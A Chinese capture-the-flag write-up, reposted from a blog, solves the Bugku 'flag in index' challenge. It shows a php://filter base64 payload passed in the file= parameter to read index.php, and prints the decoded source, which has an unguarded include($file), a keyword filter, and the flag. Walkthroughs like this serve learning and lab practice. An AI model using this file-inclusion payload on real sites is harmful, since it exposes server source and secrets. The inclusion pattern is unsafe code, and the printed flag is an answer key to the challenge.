CTF之Bugku flag在index里

匿名 (未验证) 提交于 2019-12-02 22:56:40

这是一道重新温习的题,直接来看。

“点我?不”

我就点!基本操作还是要看看源代码的,不过这个没什么好看的就不贴图了。

点完后发现URL后面有个 file=balabalabala 的,就联想到php://filter
不明白为什么会这样联想的就看看这个文章。

简单来说就是查看网页同一目录下的另一个文件。

怎么查看呢?

在file=后面加上这样一个语句php://filter/read=convert.base64-encode/resource=index.php

然后就变成这样

后面有两个等于号,base64解一下。

解出来是这样的:

<html>     <title>Bugku-ctf</title>      <?php 	error_reporting(0); 	if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} 	$file=$_GET['file']; 	if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){ 		echo "Oh no!"; 		exit(); 	} 	include($file);  //flag:flag{edulcni_elif_lacol_si_siht} ?> </html>  

flag就出来啦~~~

转载:https://blog.csdn.net/cherrie007/article/details/75269595

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!